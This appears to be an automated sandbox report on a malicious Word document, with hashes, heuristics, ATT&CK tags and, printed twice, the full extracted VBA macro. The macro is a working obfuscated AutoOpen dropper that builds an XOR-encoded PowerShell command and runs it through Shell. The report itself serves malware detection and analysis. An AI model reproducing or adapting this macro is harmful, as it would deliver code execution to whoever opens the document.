Office (OLE) malware analysis — malicious · 268fff4df4804f6e

MALICIOUS

Office (OLE)

214.2 KB Created: 2018-06-27 13:42:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: bc3474bed13990ff4d5c6b24895d4f4b SHA-1: 3fe646e8e73a0d0679f80c3f672b44310dcad154 SHA-256: 268fff4df4804f6e221add7e7d1feb8c2a4046676e8169ca500e3a1c75ba38c8

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The macro uses the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which specifically flags AutoOpen macros that execute Shell commands. The macro's obfuscated nature and the presence of a Shell() call strongly suggest it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Malware.Shell-6883057-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Shell-6883057-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

UANmko = 59992
fhTThbkFMB = pkrBKVzt + iAAZjMw + Shell(TqBJdlEOFRw + MFWOBOmqD + VRBzpzGLD, (17156 / 17156) - 1)
IbOKYA = 78378

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8554 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8554 bytes
SHA-256: `6d754bc8754bfec4360d15eefc7dd35c946bd73cae4efbdb4f78e4852ec7e28f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "dzriVUls" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IMjTIYlYinKS" Function kPiDS() On Error Resume Next uSCbkc = Sin(74533) SFsjC = zKRwQf lUwjZ = 53858 zYkGHW = 21406 raick = CDate(57027) nRtTzk = 10315 SEDbqnrX = "Hell ." + Chr(40) + " $pSHom" + "e[21]" + Chr(43) + "$" + "Psh" + "OMe[3" + "0]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + Chr(40) lCzRn = 85209 MrNun = kuzdHS GKNppF = CDate(54999) tfdua = 74553 ivmIo = Sin(75000) wvovD = 25158 nUcntjlp = "'21l70R1" + "21-12" + "7-12-9" + "5&84>70&" + "28k9" + "4b83" + "l91l84&8" + "2k69H17" + "l1" + "27k" + "84k" + "69k" aBUSNQ = 81306 FNHiwE = 53733 BOajP = OTTALC HZFsh = Sin(71147) NGVZvu = CDate(42378) NVSfir = 71169 QtlBVCB = "31" + ">102&" + "84&" + "83k114k" + "93-88R84" + "}95H6" + "9H10b2" + "1b" uawNjC = 75649 RpjjZ = 24654 YFnvAT = TbntLb zrvXU = Sin(80787) nupsuI = CDate(4948) JQcbE = 48072 lZtYjIp = "100H7" + "1b6" + "7-12" + "k2" + "2H89@69@" + "69" + "}65&11-" + "30-30}70" + ">70}70" + "k3" + "1k93l" IAKMoQ = 64823 iKQGTj = 61166 EzOaHP = MaGpV NYrQF = Sin(83104) GPZXnc = CDate(34314) rWrlZW = 44004 UQjMQmqJ = "80&8" + "2}80&95" + "}82-8" + "9k80k31&" + "65R84" + "R30}" + "71>120b" + "82k104-" + "100k112}" ShNRiT = 50860 zjKQW = 96585 uKwVm = TnjbmN FPBGm = Sin(18695) FHVnIw = CDate(72265) wFizwk = 42162 mCDoJpoS = "10" + "1k83" + "}30" + "&113l89@" + "69@" + "69>6" + "5k11l" + "30" + "b30R70>" + "70H70@3" MqEGUb = 66978 iIcZP = 21103 iiENv = nFQzuh UMPdz = Sin(44350) SXivBi = CDate(37442) ZjaYB = 355 uCBvi = "1}" + "83k84R" + "69&80l3" + "1&66&94" + "k94>87" + "k88b69" + "}8" + "8&67H" + "84@66l31" + ">88-" + "67l30&" WJBDU = 73607 IsczW = 7660 dhTbL = ZGiwkD mSXLq = Sin(71916) jhKVL = CDate(21513) sBVwK = 41871 wOnuuzKY = "72" + "l8H" + "86-123>8" + "3H1l101" + "b82b104&" + "117b3" + "0-113@" RDzRaz = 45393 JTLbw = 20364 nFtwf = lFUFH qoihv = Sin(8155) RiSRrF = CDate(18623) mnHnt = 34687 sIPtzW = "89H69R" + "69>65l" + "11>3" + "0k3" + "0}70@70" + "l70R31b" + "93-80&95" + "k86" + "H8" + "8&69k" + "69}94R6" cqQEnG = 57692 CMzLq = 39498 KXIqOB = iuoSKw uXGMs = Sin(39925) mNcPB = CDate(77831) mKDhVJ = 78482 SAIoEQWj = "8&67l3" + "1H82}" + "94@92>" + "30&" + "100k83@6" + "4l" + "102-107" + "-86}1" + "15" + "&126-30" + "l11" kPiDS = SEDbqnrX + nUcntjlp + QtlBVCB + lZtYjIp + UQjMQmqJ + mCDoJpoS + uCBvi + wOnuuzKY + sIPtzW + SAIoEQWj DnzCB = 8018 XpEFHA = 96315 BFlUH = VwrDKI YzIpQE = Sin(87435) Urlfo = CDate(81173) zQLzD = 11198 End Function Function VEbzIA() On Error Resume Next ZFtVX = 74865 qFRZoh = 37305 CzvbiL = jNGqX ANfaLv = Sin(95079) toVhQ = CDate(77545) ruVsO = 12520 ozQDkc = "3>89R" + "69&69k65" + "l11R30-" + "30l7" + "0@70" + "b7" + "0@3" + "1b8" + "4R" + "93&8" + "2k93H80" + "@66H88R8" ipRRif = 67808 tYiCb = 74763 GQnmz = WnBsWj WPozQM = Sin(48346) XJAcX = CDate(1624) bPLcuk = 54994 JBYsikHvG = "2>94>" + "82@" + "92>9" + "3l31>82b" + "94R92k3" + "0R" + "104H64&" + "105&9" + "1k92}8" ptHiC = 48582 nTtHF = 5036 okuGz = sFjVu ipuwj = Sin(21896) aEFKO = CDate(24060) QmDWPn = 4906 ddNQdkszP = "4>69}" + "5R1k116" + ">30" + "-113&89-" + "69b69l65" + "R11>30}" + "30R" + "70@70b70" + "&31l83H8" + "0&86" + "b88k8" + "4R95l95" SZihl = 69322 zRFYq = 77596 mXsrAT = VqmBv tPaTS = Sin(85836) RCFjsz = CDate(9233) JQpZKa = 99074 hvZBzX = "&80k" + "95>" + "80&67" + "@84@" + "70}31" + "R65R9" + "3&30R92&" + "84k85@88" + "-80-30R" + "93}99" SJTZI = 4433 bMhcuN = 96905 iXJLP = CDate(73620) EQjTJK = Sin(5798) UbhAHm = 97984 FXLkVn = mTKiw rXJwMzO = "-92@8" + "9b117@0" + "}30>22" + "H31" + ">9" + "8R65k9" + "3-8" NCclF = 53519 wdSRJY = 89686 MYHiz = CDate(18372) iAtUNk = Sin(72218) EmYhC = 39756 fuDwlv = kNBGqO ARfLV = "8R" + "69}25" + "l22" + "H113" + "&22l24" + "-10l21>1" FYYfO = 49202 ANWAJN = 27451 RRbvzn = CDate(41505) zJXGXU = Sin(62917) sCuzN = 92847 TwCwI = RYDtIn skvPd = "07" + "@122l" + "116>1" + "7-12" + "k17" + "k2" VEbzIA = ozQDkc + JBYsikHvG + ddNQdkszP + hvZBzX + rXJwMzO + ARfLV + skvPd VKaHr = 5144 WCPOTR = 8544 RFCIS = CDate(62076) moqwlB = Sin(8635) hRQSXp = 46970 VBLDb = IzvukY End Function Function JKiKG() On Error Resume Next NObqS = 88933 FucIV = 96986 APwwMU = CDate(33618) DDvwF = Sin(85867) zOOvP = 1944 nawpo = ukEEkM HlGETRm = "2k2k" + "6H" + "4H22-10-" + "21&1" + "04" + "@9" + "6k83&12}" + "21b84k9" + "5>71>" + "11}6" BwYGXv = 37169 IGiThE = 58582 lCNbDw = CDate(43381) JdVjQ = Sin(52679) LIdmQM = 30680 TVUqOZ = CZnSr ZAzCkE = "9R84l" + "92l65l2" + "6b22b1" + "09&22b2" + "6H" + "21}" + "107R1" + "22&" + "116-26R" + "22b31}8" CZwsr = 87865 zHQhi = 87613 uHTOuz = CDate(30245) MSUYdW = Sin(75534) Udahp = 66618 qqoJIN = EzMwfQ TqacuHn = "4-73l" + "84&22H1" + "0R87b94&" + "67@84@80" + "k82" + "l89-2" + "5}21b75" + "@71" + "k123" + ">17l88H" + "95>17&21" + "}10" HQGPE = 34976 rXBtWS = 24609 KdBRQ = CDate(63619) QiTWu = Sin(69228) OPzTE = 28585 KNAVVN = cSiPr uHYNC = "0R71l67" + "}24&74l6" + "9>67&" + "72b7" + "4&21b" + "70k1" AjiGkW = 67909 jLszv = 65255 WakoL = CDate(26041) fUNUs = Sin(70207) YsFBf = 58763 MslFY = wABRwu wToFGwE = "21-12" + "7>" + "31" + "}117}94}" + "70&95-" + "93b94&8" + "0@" + "85l1" + "19l88k9" czASn = 37742 iSjozG = 18352 HiFfDO = CDate(22196) wsFjs = Sin(21027) NlIIj = 39221 YmIpo = qUnjZ IwGHmR = "3-84-25" + "k21}75>7" + "1>123k2" + "9&" + "17k" + "21R10" mAPRi = 88013 iAjilL = 97172 AuUEF = CDate(49299) SpGAhC = Sin(45777) SCvwLw = 14673 LCLdKC = dzFUWu JLwfQWaED = "4>96>" + "83R24" + "R10H9" + "8&" + "69" + "H80" + "&67b6" + "9l28" rRaEAi = 66899 PttfcR = 65405 SOhoD = CDate(62377) tHLjwY = Sin(6016) rudsTD = 63022 hzbkIi = rnWFn iKoArcNkiXq = "@97>67>" + "94&8" + "2R84-6" + "6H66" + "l17R" + "21" AmEbXj = 48457 tEirq = 75814 itiAIa = CDate(49278) GPbJEU = Sin(68289) NktnL = 23141 QACqD = rpifFu RznVGtiqQE = "&104R9" + "6R83" + "@10l83" + "-67H84&" + "80" + "}90-10l" JzmTG = 65595 CVBZf = 96915 cKJZPa = CDate(60125) jqYsXY = Sin(87721) oJqfn = 76999 kjtLK = HOfqUl jjsBCOSd = "76k82@8" + "0&69-8" + "2R89l7" + "4b" + "76&" + "76'.SPlI" JoozA = 76971 wwNjK = 86631 LMQmw = CDate(70908) zohvuL = Sin(9352) QGivJG = 64559 NnHMjb = OYWzYX upFoC = "t" + Chr(40) + " '>}R" + "&b-kHl@" + "'" + Chr(41) + " \|forE" + "acH" + "-Obje" + "CT { [c" + "HAr] " + Chr(40) + "$_ -bx" + "Or " + Chr(34) + "0x3" + "1" + Chr(34) + Chr(41) + "} " + Chr(41) + " -" SCHwK = 84101 hQddu = 87259 sApOW = CDate(82083) sCKWz = Sin(46506) BTuGtf = 5276 TpuFwh = RXUIX EYEcQhutPo = "JOIN" + " '' " + Chr(41) + " " JKiKG = HlGETRm + ZAzCkE + TqacuHn + uHYNC + wToFGwE + IwGHmR + JLwfQWaED + iKoArcNkiXq + RznVGtiqQE + jjsBCOSd + upFoC + EYEcQhutPo pviZLV = 3277 UKlYA = 24853 IFowU = CDate(94304) wbUThO = Sin(38631) dofWp = 13893 dBRLZ = uoLRfI End Function Attribute VB_Name = "wAwmAtoRYkMQ" Function jzEEiDmWnsJ() On Error Resume Next AMhiY = 93514 jsXpwk = 84418 YwfDG = Sin(99127) JbiWDR = CDate(87367) QtWpX = NzGIDJ nkOTbp = 63434 dijaRn = niiLiAiDbT + Chr(UCpuiH + 80 + lbkQPhzvJb) + "ow" + "ers" wpzfI = 77466 MYFhjJ = 27231 iiKYP = Sin(62914) rzkWb = CDate(4150) joEVcI = WvDju UOnhu = 22437 iSXWL = 23905 sRtHiB = 1087 QKiztv = Sin(27522) apDwR = CDate(66194) jQwwa = PZQoiw GwJiMJ = 72164 jzEEiDmWnsJ = kHdFZBPBnWD + dijaRn + kPiDS + VEbzIA + JKiKG niMLRY = 30226 AzwzDh = 64514 wUXASY = Sin(75714) SuXJb = CDate(69413) KLrcTo = OTidA zEPYzW = 8069 End Function Function AKCfYGZjwZl(MFWOBOmqD) On Error Resume Next niSnj = 30996 VKGzL = 52539 mbqhi = Sin(45952) kGfSPM = CDate(61293) OriCM = cETSM ufIJX = 27485 OaEzM = 28746 HaVBOB = CDate(1226) DajvOi = 41716 hiGMV = jFhKo hFaBw = Sin(59226) UANmko = 59992 fhTThbkFMB = pkrBKVzt + iAAZjMw + Shell(TqBJdlEOFRw + MFWOBOmqD + VRBzpzGLD, (17156 / 17156) - 1) IbOKYA = 78378 SUUanF = CDate(31017) LOmRj = 6039 IhdDG = KzrzS YUATzP = Sin(86247) cjmzq = 12042 End Function Sub AutoOpen() On Error Resume Next KOicV = 48133 fVPivD = CDate(51828) iPSAv = 80992 OUSudG = QtAdd CBaHzf = Sin(71795) zXCCfr = 33385 Application.Run "AKCfYGZjwZl", jzEEiDmWnsJ KcZam = 23423 rIAtfb = CDate(62883) NVODp = 16059 zdHWkF = tiQuNs VPpqV = Sin(55946) WdLMZX = 63875 End Sub

SHA-256: 6d754bc8754bfec4360d15eefc7dd35c946bd73cae4efbdb4f78e4852ec7e28f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "dzriVUls"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IMjTIYlYinKS"
Function kPiDS()
On Error Resume Next
uSCbkc = Sin(74533)
SFsjC = zKRwQf
lUwjZ = 53858
zYkGHW = 21406
raick = CDate(57027)
nRtTzk = 10315
SEDbqnrX = "Hell ." + Chr(40) + " $pSHom" + "e[21]" + Chr(43) + "$" + "Psh" + "OMe[3" + "0]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + Chr(40)
lCzRn = 85209
MrNun = kuzdHS
GKNppF = CDate(54999)
tfdua = 74553
ivmIo = Sin(75000)
wvovD = 25158
nUcntjlp = "'21l70R1" + "21-12" + "7-12-9" + "5&84>70&" + "28k9" + "4b83" + "l91l84&8" + "2k69H17" + "l1" + "27k" + "84k" + "69k"
aBUSNQ = 81306
FNHiwE = 53733
BOajP = OTTALC
HZFsh = Sin(71147)
NGVZvu = CDate(42378)
NVSfir = 71169
QtlBVCB = "31" + ">102&" + "84&" + "83k114k" + "93-88R84" + "}95H6" + "9H10b2" + "1b"
uawNjC = 75649
RpjjZ = 24654
YFnvAT = TbntLb
zrvXU = Sin(80787)
nupsuI = CDate(4948)
JQcbE = 48072
lZtYjIp = "100H7" + "1b6" + "7-12" + "k2" + "2H89@69@" + "69" + "}65&11-" + "30-30}70" + ">70}70" + "k3" + "1k93l"
IAKMoQ = 64823
iKQGTj = 61166
EzOaHP = MaGpV
NYrQF = Sin(83104)
GPZXnc = CDate(34314)
rWrlZW = 44004
UQjMQmqJ = "80&8" + "2}80&95" + "}82-8" + "9k80k31&" + "65R84" + "R30}" + "71>120b" + "82k104-" + "100k112}"
ShNRiT = 50860
zjKQW = 96585
uKwVm = TnjbmN
FPBGm = Sin(18695)
FHVnIw = CDate(72265)
wFizwk = 42162
mCDoJpoS = "10" + "1k83" + "}30" + "&113l89@" + "69@" + "69>6" + "5k11l" + "30" + "b30R70>" + "70H70@3"
MqEGUb = 66978
iIcZP = 21103
iiENv = nFQzuh
UMPdz = Sin(44350)
SXivBi = CDate(37442)
ZjaYB = 355
uCBvi = "1}" + "83k84R" + "69&80l3" + "1&66&94" + "k94>87" + "k88b69" + "}8" + "8&67H" + "84@66l31" + ">88-" + "67l30&"
WJBDU = 73607
IsczW = 7660
dhTbL = ZGiwkD
mSXLq = Sin(71916)
jhKVL = CDate(21513)
sBVwK = 41871
wOnuuzKY = "72" + "l8H" + "86-123>8" + "3H1l101" + "b82b104&" + "117b3" + "0-113@"
RDzRaz = 45393
JTLbw = 20364
nFtwf = lFUFH
qoihv = Sin(8155)
RiSRrF = CDate(18623)
mnHnt = 34687
sIPtzW = "89H69R" + "69>65l" + "11>3" + "0k3" + "0}70@70" + "l70R31b" + "93-80&95" + "k86" + "H8" + "8&69k" + "69}94R6"
cqQEnG = 57692
CMzLq = 39498
KXIqOB = iuoSKw
uXGMs = Sin(39925)
mNcPB = CDate(77831)
mKDhVJ = 78482
SAIoEQWj = "8&67l3" + "1H82}" + "94@92>" + "30&" + "100k83@6" + "4l" + "102-107" + "-86}1" + "15" + "&126-30" + "l11"
kPiDS = SEDbqnrX + nUcntjlp + QtlBVCB + lZtYjIp + UQjMQmqJ + mCDoJpoS + uCBvi + wOnuuzKY + sIPtzW + SAIoEQWj
DnzCB = 8018
XpEFHA = 96315
BFlUH = VwrDKI
YzIpQE = Sin(87435)
Urlfo = CDate(81173)
zQLzD = 11198
End Function
Function VEbzIA()
On Error Resume Next
ZFtVX = 74865
qFRZoh = 37305
CzvbiL = jNGqX
ANfaLv = Sin(95079)
toVhQ = CDate(77545)
ruVsO = 12520
ozQDkc = "3>89R" + "69&69k65" + "l11R30-" + "30l7" + "0@70" + "b7" + "0@3" + "1b8" + "4R" + "93&8" + "2k93H80" + "@66H88R8"
ipRRif = 67808
tYiCb = 74763
GQnmz = WnBsWj
WPozQM = Sin(48346)
XJAcX = CDate(1624)
bPLcuk = 54994
JBYsikHvG = "2>94>" + "82@" + "92>9" + "3l31>82b" + "94R92k3" + "0R" + "104H64&" + "105&9" + "1k92}8"
ptHiC = 48582
nTtHF = 5036
okuGz = sFjVu
ipuwj = Sin(21896)
aEFKO = CDate(24060)
QmDWPn = 4906
ddNQdkszP = "4>69}" + "5R1k116" + ">30" + "-113&89-" + "69b69l65" + "R11>30}" + "30R" + "70@70b70" + "&31l83H8" + "0&86" + "b88k8" + "4R95l95"
SZihl = 69322
zRFYq = 77596
mXsrAT = VqmBv
tPaTS = Sin(85836)
RCFjsz = CDate(9233)
JQpZKa = 99074
hvZBzX = "&80k" + "95>" + "80&67" + "@84@" + "70}31" + "R65R9" + "3&30R92&" + "84k85@88" + "-80-30R" + "93}99"
SJTZI = 4433
bMhcuN = 96905
iXJLP = CDate(73620)
EQjTJK = Sin(5798)
UbhAHm = 97984
FXLkVn = mTKiw
rXJwMzO = "-92@8" + "9b117@0" + "}30>22" + "H31" + ">9" + "8R65k9" + "3-8"
NCclF = 53519
wdSRJY = 89686
MYHiz = CDate(18372)
iAtUNk = Sin(72218)
EmYhC = 39756
fuDwlv = kNBGqO
ARfLV = "8R" + "69}25" + "l22" + "H113" + "&22l24" + "-10l21>1"
FYYfO = 49202
ANWAJN = 27451
RRbvzn = CDate(41505)
zJXGXU = Sin(62917)
sCuzN = 92847
TwCwI = RYDtIn
skvPd = "07" + "@122l" + "116>1" + "7-12" + "k17" + "k2"
VEbzIA = ozQDkc + JBYsikHvG + ddNQdkszP + hvZBzX + rXJwMzO + ARfLV + skvPd
VKaHr = 5144
WCPOTR = 8544
RFCIS = CDate(62076)
moqwlB = Sin(8635)
hRQSXp = 46970
VBLDb = IzvukY
End Function
Function JKiKG()
On Error Resume Next
NObqS = 88933
FucIV = 96986
APwwMU = CDate(33618)
DDvwF = Sin(85867)
zOOvP = 1944
nawpo = ukEEkM
HlGETRm = "2k2k" + "6H" + "4H22-10-" + "21&1" + "04" + "@9" + "6k83&12}" + "21b84k9" + "5>71>" + "11}6"
BwYGXv = 37169
IGiThE = 58582
lCNbDw = CDate(43381)
JdVjQ = Sin(52679)
LIdmQM = 30680
TVUqOZ = CZnSr
ZAzCkE = "9R84l" + "92l65l2" + "6b22b1" + "09&22b2" + "6H" + "21}" + "107R1" + "22&" + "116-26R" + "22b31}8"
CZwsr = 87865
zHQhi = 87613
uHTOuz = CDate(30245)
MSUYdW = Sin(75534)
Udahp = 66618
qqoJIN = EzMwfQ
TqacuHn = "4-73l" + "84&22H1" + "0R87b94&" + "67@84@80" + "k82" + "l89-2" + "5}21b75" + "@71" + "k123" + ">17l88H" + "95>17&21" + "}10"
HQGPE = 34976
rXBtWS = 24609
KdBRQ = CDate(63619)
QiTWu = Sin(69228)
OPzTE = 28585
KNAVVN = cSiPr
uHYNC = "0R71l67" + "}24&74l6" + "9>67&" + "72b7" + "4&21b" + "70k1"
AjiGkW = 67909
jLszv = 65255
WakoL = CDate(26041)
fUNUs = Sin(70207)
YsFBf = 58763
MslFY = wABRwu
wToFGwE = "21-12" + "7>" + "31" + "}117}94}" + "70&95-" + "93b94&8" + "0@" + "85l1" + "19l88k9"
czASn = 37742
iSjozG = 18352
HiFfDO = CDate(22196)
wsFjs = Sin(21027)
NlIIj = 39221
YmIpo = qUnjZ
IwGHmR = "3-84-25" + "k21}75>7" + "1>123k2" + "9&" + "17k" + "21R10"
mAPRi = 88013
iAjilL = 97172
AuUEF = CDate(49299)
SpGAhC = Sin(45777)
SCvwLw = 14673
LCLdKC = dzFUWu
JLwfQWaED = "4>96>" + "83R24" + "R10H9" + "8&" + "69" + "H80" + "&67b6" + "9l28"
rRaEAi = 66899
PttfcR = 65405
SOhoD = CDate(62377)
tHLjwY = Sin(6016)
rudsTD = 63022
hzbkIi = rnWFn
iKoArcNkiXq = "@97>67>" + "94&8" + "2R84-6" + "6H66" + "l17R" + "21"
AmEbXj = 48457
tEirq = 75814
itiAIa = CDate(49278)
GPbJEU = Sin(68289)
NktnL = 23141
QACqD = rpifFu
RznVGtiqQE = "&104R9" + "6R83" + "@10l83" + "-67H84&" + "80" + "}90-10l"
JzmTG = 65595
CVBZf = 96915
cKJZPa = CDate(60125)
jqYsXY = Sin(87721)
oJqfn = 76999
kjtLK = HOfqUl
jjsBCOSd = "76k82@8" + "0&69-8" + "2R89l7" + "4b" + "76&" + "76'.SPlI"
JoozA = 76971
wwNjK = 86631
LMQmw = CDate(70908)
zohvuL = Sin(9352)
QGivJG = 64559
NnHMjb = OYWzYX
upFoC = "t" + Chr(40) + " '>}R" + "&b-kHl@" + "'" + Chr(41) + " |forE" + "acH" + "-Obje" + "CT { [c" + "HAr] " + Chr(40) + "$_ -bx" + "Or " + Chr(34) + "0x3" + "1" + Chr(34) + Chr(41) + "} " + Chr(41) + " -"
SCHwK = 84101
hQddu = 87259
sApOW = CDate(82083)
sCKWz = Sin(46506)
BTuGtf = 5276
TpuFwh = RXUIX
EYEcQhutPo = "JOIN" + " '' " + Chr(41) + "   "
JKiKG = HlGETRm + ZAzCkE + TqacuHn + uHYNC + wToFGwE + IwGHmR + JLwfQWaED + iKoArcNkiXq + RznVGtiqQE + jjsBCOSd + upFoC + EYEcQhutPo
pviZLV = 3277
UKlYA = 24853
IFowU = CDate(94304)
wbUThO = Sin(38631)
dofWp = 13893
dBRLZ = uoLRfI
End Function


Attribute VB_Name = "wAwmAtoRYkMQ"
Function jzEEiDmWnsJ()
On Error Resume Next
AMhiY = 93514
jsXpwk = 84418
YwfDG = Sin(99127)
JbiWDR = CDate(87367)
QtWpX = NzGIDJ
nkOTbp = 63434
dijaRn = niiLiAiDbT + Chr(UCpuiH + 80 + lbkQPhzvJb) + "ow" + "ers"
wpzfI = 77466
MYFhjJ = 27231
iiKYP = Sin(62914)
rzkWb = CDate(4150)
joEVcI = WvDju
UOnhu = 22437
iSXWL = 23905
sRtHiB = 1087
QKiztv = Sin(27522)
apDwR = CDate(66194)
jQwwa = PZQoiw
GwJiMJ = 72164
jzEEiDmWnsJ = kHdFZBPBnWD + dijaRn + kPiDS + VEbzIA + JKiKG
niMLRY = 30226
AzwzDh = 64514
wUXASY = Sin(75714)
SuXJb = CDate(69413)
KLrcTo = OTidA
zEPYzW = 8069
End Function
Function AKCfYGZjwZl(MFWOBOmqD)
On Error Resume Next
niSnj = 30996
VKGzL = 52539
mbqhi = Sin(45952)
kGfSPM = CDate(61293)
OriCM = cETSM
ufIJX = 27485
OaEzM = 28746
HaVBOB = CDate(1226)
DajvOi = 41716
hiGMV = jFhKo
hFaBw = Sin(59226)
UANmko = 59992
fhTThbkFMB = pkrBKVzt + iAAZjMw + Shell(TqBJdlEOFRw + MFWOBOmqD + VRBzpzGLD, (17156 / 17156) - 1)
IbOKYA = 78378
SUUanF = CDate(31017)
LOmRj = 6039
IhdDG = KzrzS
YUATzP = Sin(86247)
cjmzq = 12042
End Function
Sub AutoOpen()
On Error Resume Next
KOicV = 48133
fVPivD = CDate(51828)
iPSAv = 80992
OUSudG = QtAdd
CBaHzf = Sin(71795)
zXCCfr = 33385
Application.Run "AKCfYGZjwZl", jzEEiDmWnsJ
KcZam = 23423
rIAtfb = CDate(62883)
NVODp = 16059
zdHWkF = tiQuNs
VPpqV = Sin(55946)
WdLMZX = 63875
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.